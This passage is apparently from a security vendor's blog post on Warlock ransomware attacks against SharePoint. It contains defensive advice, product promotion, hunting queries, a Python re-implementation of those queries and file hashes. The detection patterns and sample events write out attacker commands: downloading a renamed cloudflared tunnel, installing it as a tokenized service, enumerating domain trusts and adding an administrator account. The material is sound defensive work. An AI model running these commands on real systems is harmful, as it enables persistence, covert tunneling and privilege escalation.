Both cases illustrate LockBit 3.0’s continued use of DLL sideloading through legitimate executables to evade detection and achieve execution within compromised systems.
We identified another infection that used two different extensions: one the same as the previously noted extension, the other an “.xlockxlock” extension.
We have also externally sourced an MSI file containing the ransomware components, indicating that the malware may also be delivered as an installer package.
Conclusion
The Warlock ransomware attack provides a case study in the speed and depth with which adversaries can compromise unpatched enterprise environments. By exploiting SharePoint’s authentication and deserialization flaws, attackers were able to rapidly gain code execution, escalate privileges, move laterally within the environment, and deliver disruptive ransomware at scale. Each phase—from web shell deployment and key extraction to credential theft and data exfiltration—underscores the urgent need for holistic patching, network defense, and layered detection capabilities.
To defend against Warlock ransomware and similar threats, organizations should promptly patch their on-premises SharePoint servers. In addition to Microsoft’s security updates, Trend has released targeted updates, proactive detection rules, and network filters that can help block exploitation attempts, along with investigative tools that enable customers to assess their potential exposure to these vulnerabilities. We also recommend watching the webinar Dealing with the fallout of a failed SharePoint patch: Are you protected?, which offers practical advice on protection and recovery. The complete list of available solutions can be found in our knowledge base entry.
Organizations should actively monitor suspicious account activity or policy changes, restrict access to administrative shares, and promptly flag abnormal script or command executions. They should also detect and respond to attempts to disable security tools, block unauthorized service or driver installations, and identify signs of lateral movement, credential dumping, or unexpected RDP configuration changes. Continuous monitoring for protocol tunneling, command-and-control activity, and data exfiltration through renamed or disguised tools is essential. Maintaining up-to-date security signatures, conducting regular threat sweeps with Trend Vision One™, and reinforcing defenses through strong user awareness programs and tested incident response plans are critical components of an effective security posture.
Proactive security with Trend Vision One™
Trend Vision One™ is the only AI-powered enterprise cybersecurity platform that centralizes cyber risk exposure management, security operations, and robust layered protection. This holistic approach helps enterprises predict and prevent threats, accelerating proactive security outcomes across their respective digital estate. With Trend Vision One, you’re enabled to eliminate security blind spots, focus on what matters most, and elevate security into a strategic partner for innovation, including against novel ransomware variants such as the one discussed in this blog.
Trend Vision One™ Threat Intelligence
To stay ahead of evolving threats, Trend customers can access Trend Vision One™ Threat Insights, which provides the latest insights from Trend™ Research on emerging threats and threat actors.
Trend Vision One Threat Insights
Trend Vision One Intelligence Reports (IOC Sweeping)
Hunting Queries
Trend Vision One Search App
Trend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment.
Detection Query for Warlock with KillAV
(malName:WARLOCK AND malName:KILLAV) AND eventName:MALWARE_DETECTION
Microsoft SharePoint Server Vulnerability Exploitation
tags: XSAE.F2555
Domain Trusts Discovery Commands via Nltest from Exploited Sharepoint server
tags: XSAE.F1842 AND parentCmd: (w3wp.exe AND -ap AND SharePoint)
Downloading of Renamed Cloudflare Tunneling Tool
objectCmd: curl.exe AND -L AND -o AND objectCmd: macfee_agent.exe*GitHub.com*cloudflared-windows-amd64*
Service elevation of renamed cloudflare binary
eventSubId: 402 AND objectRegistryKeyHandle: cloudflared AND objectRegistryData: *hpmews03.exe*tunnel run*--token*
Suspicious adding of new user in administrator group from exploited sharepoint server
parentCmd: (w3wp.exe AND -ap AND sharepoint) AND objectCmd: localgroup administrators*/add
More hunting queries are available for Trend Vision One customers with Threat Insights Entitlement enabled.
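For readers who do not have the Search App, the following is an added example (not Trend Micro's code and not part of the original post) that re-implements the matching logic of the four process- and registry-based hunting queries above in plain Python and runs it over constructed sample telemetry. Field names such as parent_cmd, object_cmd, event_sub_id, registry_key and registry_data are assumptions standing in for the Vision One attributes parentCmd, objectCmd, eventSubId, objectRegistryKeyHandle and objectRegistryData; the XSAE.F1842 filter is not public, so it is replaced here by an assumed check for nltest with a trust-enumeration switch, and every command line, registry path and username in the sample events is constructed.

```python
"""Re-implementation of the page's behavioural hunting queries over sample events.

Assumptions (not from the original post): attribute names, the nltest check that
stands in for filter XSAE.F1842, and all sample event contents below.
"""
import fnmatch
from dataclasses import dataclass


@dataclass
class Event:
    event_id: int               # constructed sequence number
    parent_cmd: str = ""        # stands in for parentCmd
    object_cmd: str = ""        # stands in for objectCmd
    event_sub_id: int = 0       # stands in for eventSubId (402 in the page's registry query)
    registry_key: str = ""      # stands in for objectRegistryKeyHandle
    registry_data: str = ""     # stands in for objectRegistryData


def spawned_by_sharepoint_w3wp(ev: Event) -> bool:
    """parentCmd: (w3wp.exe AND -ap AND sharepoint): all three tokens, case-insensitive."""
    parent = ev.parent_cmd.lower()
    return all(tok in parent for tok in ("w3wp.exe", "-ap", "sharepoint"))


def rule_nltest_domain_trusts(ev: Event) -> bool:
    """Domain trust discovery via nltest from the SharePoint worker process.
    The 'nltest' + 'trust' check is an assumed stand-in for tag XSAE.F1842."""
    cmd = ev.object_cmd.lower()
    return spawned_by_sharepoint_w3wp(ev) and "nltest" in cmd and "trust" in cmd


def rule_renamed_cloudflared_download(ev: Event) -> bool:
    """objectCmd: curl.exe AND -L AND -o AND objectCmd: macfee_agent.exe*GitHub.com*cloudflared-windows-amd64*
    A leading wildcard is added so the pattern may match anywhere in the command line."""
    cmd = ev.object_cmd.lower()
    tokens = cmd.split()
    has_curl = any(tok.endswith("curl.exe") for tok in tokens)
    return (has_curl and "-l" in tokens and "-o" in tokens
            and fnmatch.fnmatchcase(cmd, "*macfee_agent.exe*github.com*cloudflared-windows-amd64*"))


def rule_cloudflared_service_token(ev: Event) -> bool:
    """eventSubId: 402 AND objectRegistryKeyHandle: cloudflared AND
    objectRegistryData: *hpmews03.exe*tunnel run*--token*"""
    return (ev.event_sub_id == 402
            and "cloudflared" in ev.registry_key.lower()
            and fnmatch.fnmatchcase(ev.registry_data.lower(), "*hpmews03.exe*tunnel run*--token*"))


def rule_admin_group_add(ev: Event) -> bool:
    """parentCmd: (w3wp.exe AND -ap AND sharepoint) AND objectCmd: localgroup administrators*/add"""
    return (spawned_by_sharepoint_w3wp(ev)
            and fnmatch.fnmatchcase(ev.object_cmd.lower(), "*localgroup administrators*/add*"))


RULES = {
    "nltest_domain_trusts": rule_nltest_domain_trusts,
    "renamed_cloudflared_download": rule_renamed_cloudflared_download,
    "cloudflared_service_token": rule_cloudflared_service_token,
    "admin_group_add": rule_admin_group_add,
}


def hunt(events):
    """Return {event_id: [matching rule names]} for every event hitting at least one rule."""
    hits = {}
    for ev in events:
        matched = [name for name, fn in RULES.items() if fn(ev)]
        if matched:
            hits[ev.event_id] = matched
    return hits


# Constructed sample telemetry. SP_PARENT mimics an IIS worker hosting a SharePoint app pool.
SP_PARENT = r'c:\windows\system32\inetsrv\w3wp.exe -ap "SharePoint - 80" -v "v4.0"'
SAMPLE_EVENTS = [
    Event(1, parent_cmd=SP_PARENT, object_cmd="nltest.exe /domain_trusts /all_trusts"),
    Event(2, parent_cmd=SP_PARENT, object_cmd="cmd.exe /c net localgroup administrators newadmin /add"),
    Event(3, parent_cmd="explorer.exe",
          object_cmd="curl.exe -L -o macfee_agent.exe "
                     "https://github.com/EXAMPLE-ORG/EXAMPLE-REPO/cloudflared-windows-amd64.exe"),
    Event(4, event_sub_id=402,
          registry_key=r"HKLM\SYSTEM\CurrentControlSet\Services\cloudflared",
          registry_data=r"C:\ProgramData\hpmews03.exe tunnel run --token <PLACEHOLDER_TOKEN>"),
    Event(5, parent_cmd=SP_PARENT, object_cmd="conhost.exe 0xffffffff -ForceV1"),   # benign
    Event(6, parent_cmd="cmd.exe", object_cmd="net localgroup administrators"),      # listing only
]

if __name__ == "__main__":
    for event_id, names in hunt(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(names)}")
```

Events 5 and 6 are included deliberately: a child of the SharePoint worker that is not itself suspicious, and a plain group listing without `/add`, both fall through all four rules, which is the false-positive behaviour you want to confirm before turning a hunting query into an alert.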
Indicators of Compromise
SHA-1 | Detection name |
0bbbf2a9d49152ac6ad755167ccb0f2b4f00b976 | Ransom.Win32.WARLOCK.A.note |
cf0da7f6450f09c8958e253bd606b83aa80558f2 | Ransom.Win32.WARLOCK.A |
8b13118b378293b9dc891b57121113d0aea3ac8a | Ransom.Win32.WARLOCK.A |
0488509b4dbc16dcb6d5f531e3c8b9a59b69e522 | Trojan.Win64.KILLAV.I |
With additional analysis from Maristel Policarpio, Sarah Pearl Camiling, Jacob Santos, Don Ladores